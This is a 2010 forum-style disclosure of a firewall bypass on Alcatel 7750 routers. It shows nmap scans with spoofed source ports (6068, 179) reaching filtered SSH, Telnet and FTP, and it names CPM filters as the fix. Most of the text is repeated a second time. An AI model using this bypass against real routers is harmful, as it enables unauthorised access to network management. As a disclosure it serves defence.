security vulnerability in 7750 Service Router
Posted: 26 May 2010 15:54
A serious security vulnerability has been detected in Alcatel 7750 SR routers. By setting source port to 6068, you can reach to SSH, Telnet and FTP services through VPRN interface with no-CPM filter.
Also by setting source port under 1024, you can reach SSH service. Unless it is patched, 7750 router is open to hackers, script kiddies, crackers.
Software: 7.0R9
TCP port 6068 is ANCP "Access Node Control Protocol" described in draft draft-ietf-ancp-protocol-04.txt. This is an extension of the General Switch Management Protocol (GSMPv3).
TCP traffic sourced from port 6068 has full access to FTP, Telnet and SSH on the 7750.
The issue is very easy to reproduce, all that is needed is a VPRN interface and no CPM-filter. In this case we used VPRN 3502. This problem can easily be stopped by CPM filters.
Here we can see that the nmap port scanner sees TCP port 6068 open:
root@:~# nmap -sS -n X.X.X.X -p 6068
PORT STATE SERVICE
6068/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
We can also see that SSH port 22 is NOT open:
root@:~# nmap -sS -n X.X.X.X -p 22
PORT STATE SERVICE
22/tcp filtered ssh
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Until we change the source port to 6068 and then we can see that SSH is open:
root@:~# nmap -sS -n X.X.X.X -g 6068 -p 22
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
Same for Telnet:
root@:~# nmap -sS -n X.X.X.X -g 6068 -p 23
PORT STATE SERVICE
23/tcp open telnet
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
Same for FTP
root@:~# nmap -sS -n X.X.X.X -g 6068 -p 21
PORT STATE SERVICE
21/tcp open ftp
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
Now with this information it is very easy to access the CLI and attempt to login by making your SSH session use a source port of 6068.
Also 7750 accepts SSH sessions that has a source port less then 1024. For example below (and tested with a SSH session) the 7750 allows an SSH session with a source port of 179 (BGP)
root@:~# nmap -sS -n X.X.X.X -g 179 -p 22
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
Also by setting source port under 1024, you can reach SSH service. Unless it is patched, 7750 router is open to hackers, script kiddies, crackers.
Software: 7.0R9
TCP port 6068 is ANCP "Access Node Control Protocol" described in draft draft-ietf-ancp-protocol-04.txt. This is an extension of the General Switch Management Protocol (GSMPv3).
TCP traffic sourced from port 6068 has full access to FTP, Telnet and SSH on the 7750.
The issue is very easy to reproduce, all that is needed is a VPRN interface and no CPM-filter. In this case we used VPRN 3502. This problem can easily be stopped by CPM filters.
Here we can see that the nmap port scanner sees TCP port 6068 open:
root@:~# nmap -sS -n X.X.X.X -p 6068
PORT STATE SERVICE
6068/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
We can also see that SSH port 22 is NOT open:
root@:~# nmap -sS -n X.X.X.X -p 22
PORT STATE SERVICE
22/tcp filtered ssh
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Until we change the source port to 6068 and then we can see that SSH is open:
root@:~# nmap -sS -n X.X.X.X -g 6068 -p 22
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
Same for Telnet:
root@:~# nmap -sS -n X.X.X.X -g 6068 -p 23
PORT STATE SERVICE
23/tcp open telnet
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
Same for FTP
root@:~# nmap -sS -n X.X.X.X -g 6068 -p 21
PORT STATE SERVICE
21/tcp open ftp
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
Now with this information it is very easy to access the CLI and attempt to login by making your SSH session use a source port of 6068.
Also 7750 accepts SSH sessions that has a source port less then 1024. For example below (and tested with a SSH session) the 7750 allows an SSH session with a source port of 179 (BGP)
root@:~# nmap -sS -n X.X.X.X -g 179 -p 22
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds